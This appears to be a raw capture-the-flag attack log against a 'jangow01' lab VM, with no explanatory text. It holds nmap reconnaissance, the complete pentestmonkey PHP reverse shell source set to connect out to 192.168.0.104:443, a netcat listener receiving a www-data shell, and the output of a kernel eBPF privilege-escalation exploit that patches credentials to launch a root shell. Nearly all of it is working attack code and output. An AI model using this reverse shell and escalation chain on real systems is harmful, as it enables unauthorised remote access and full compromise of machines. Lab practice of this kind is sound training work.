$ sudo nmap -sP 192.168.0.1/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.1
Host is up (0.00042s latency).
MAC Address: 24:69:8E:07:FE:4E (Shenzhen Mercury Communication Technologies)
Nmap scan report for 192.168.0.101
Host is up (0.055s latency).
MAC Address: 62:95:C5:46:4A:54 (Unknown)
Nmap scan report for 192.168.0.102
Host is up (0.17s latency).
MAC Address: 52:43:BB:A1:BF:A7 (Unknown)
Nmap scan report for 192.168.0.103
Host is up (0.19s latency).
MAC Address: DA:3F:DF:36:C2:F8 (Unknown)
Nmap scan report for 192.168.0.105
Host is up (0.18s latency).
MAC Address: C8:94:02:0F:E5:33 (Chongqing Fugui Electronics)
Nmap scan report for 192.168.0.107
Host is up (0.20s latency).
MAC Address: 50:01:D9:DA:FA:DD (Huawei Technologies)
Nmap scan report for 192.168.0.109
Host is up (0.0016s latency).
MAC Address: E8:6A:64:83:2C:C0 (Lcfc(hefei) Electronics Technology)
Nmap scan report for 192.168.0.110
Host is up (0.00017s latency).
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.0.104
Host is up.
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.37 seconds
$ sudo nmap -sV -sC -A 192.168.0.110
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 15:07 CST
Nmap scan report for 192.168.0.110
Host is up (0.00029s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
80/tcp open  http    Apache httpd 2.4.18
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2021-06-10 18:05  site/
|_
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 08:00:27:09:9C:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.0.1; OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.0.110

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.47 seconds
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP. Comments stripped to slim it down.
// RE: https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit(0);
$VERSION = "1.0";
$ip = '192.168.0.104';
$port = 443;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; sh -i';
$daemon = 0;
$debug = 0;

if (function_exists('pcntl_fork')) {
    $pid = pcntl_fork();
    if ($pid == -1) {
        printit("ERROR: Can't fork");
        exit(1);
    }
    if ($pid) {
        exit(0); // Parent exits
    }
    if (posix_setsid() == -1) {
        printit("Error: Can't setsid()");
        exit(1);
    }
    $daemon = 1;
} else {
    printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}

chdir("/");
umask(0);

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
    printit("$errstr ($errno)");
    exit(1);
}

$descriptorspec = array(
    0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
    printit("ERROR: Can't spawn shell");
    exit(1);
}

stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
    if (feof($sock)) {
        printit("ERROR: Shell connection terminated");
        break;
    }
    if (feof($pipes[1])) {
        printit("ERROR: Shell process terminated");
        break;
    }
    $read_a = array($sock, $pipes[1], $pipes[2]);
    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
    if (in_array($sock, $read_a)) {
        if ($debug) printit("SOCK READ");
        $input = fread($sock, $chunk_size);
        if ($debug) printit("SOCK: $input");
        fwrite($pipes[0], $input);
    }
    if (in_array($pipes[1], $read_a)) {
        if ($debug) printit("STDOUT READ");
        $input = fread($pipes[1], $chunk_size);
        if ($debug) printit("STDOUT: $input");
        fwrite($sock, $input);
    }
    if (in_array($pipes[2], $read_a)) {
        if ($debug) printit("STDERR READ");
        $input = fread($pipes[2], $chunk_size);
        if ($debug) printit("STDERR: $input");
        fwrite($sock, $input);
    }
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

function printit($string) {
    if (!$daemon) {
        print "$string\n";
    }
}
?>
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.0.104] from (UNKNOWN) [192.168.0.110] 34204
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
 13:05:30 up 59 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@jangow01:/$ uname -a
Linux jangow01 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
www-data@jangow01:/$ lsb_release -a
lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.1 LTS
Release: 16.04
Codename: xenial
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.]   ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] skbuff => ffff880035959c00
[*] Leaking sock struct from ffff8800381252c0
[*] Sock->sk_rcvtimeo at offset 472
[*] Cred structure at ffff88003ad06e40
[*] UID from cred structure: 33, matches the current: 33
[*] hammering cred structure at ffff88003ad06e40
[*] credentials patched, launching shell...